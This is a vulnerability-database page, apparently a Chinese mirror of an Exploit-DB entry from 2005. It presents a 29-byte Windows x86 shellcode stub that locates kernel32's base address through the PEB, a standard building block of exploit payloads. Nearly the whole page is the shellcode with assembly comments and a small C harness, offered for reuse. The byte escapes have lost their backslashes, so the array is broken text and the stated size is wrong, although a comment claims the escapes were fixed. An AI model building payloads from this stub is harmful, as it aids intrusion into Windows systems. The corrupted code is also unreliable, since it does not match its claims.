Windows (9x/NT/2000/XP) – PEB Method Shellcode (29 bytes)


漏洞ID 1055289 漏洞类型
发布时间 2005-07-26 更新时间 2005-07-26
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Windows_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13525
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
//
// PEB way of getting kernel32 imagebase by loco.
// Compatible with all Win9x/NT based operating systems.
//
// Gives kernel32 imagebase in eax when executing.
// 29 bytes, only eax/esi used.
//
// Originally discovered by Dino Dai Zovi.
//
//

#include <stdio.h>

/*
	xor   eax, eax
	add   eax, fs:[eax+30h]
	js    method_9x

method_nt:
	mov   eax, [eax + 0ch]
	mov   esi, [eax + 1ch]
	lodsd
	mov   eax, [eax + 08h]
	jmp   kernel32_ptr_found

method_9x:
	mov   eax, [eax + 34h]
	lea   eax, [eax + 7ch]
	mov   eax, [eax + 3ch]
kernel32_ptr_found:
*/

unsigned char Shellcode[] =
	"x33xC0"          // xor eax, eax
	"x64x03x40x30"  // add eax, dword ptr fs:[eax+30]
	"x78x0C"          // js short $+12
	"x8Bx40x0C"      // mov eax, dword ptr [eax+0C]
	"x8Bx70x1C"      // mov esi, dword ptr [eax+1C]
	"xAD"              // lodsd
	"x8Bx40x08"      // mov eax, dword ptr [eax+08]
	"xEBx09"          // jmp short $+9
	"x8Bx40x34"      // mov eax, dword ptr [eax+34]
	"x8Dx40x7C"      // lea eax, dword ptr [eax+7C]
	"x8Bx40x3C"      // mov eax, dword ptr [eax+3C]
; // = 29 bytes.

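/*
 * Prints the stub length: the array size minus the string literal's NUL.
 *
 * Fixes: the "\n\n" escapes had lost their backslashes; sizeof yields a
 * size_t, so printing it with %u was undefined behavior (%zu matches); and
 * main returned 1, which reports failure to the shell although nothing failed.
 */
int main(void)
{
	printf("Shellcode is %zu bytes.\n\n", sizeof(Shellcode) - 1);
	return 0;
}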

// milw0rm.com [2005-07-26]
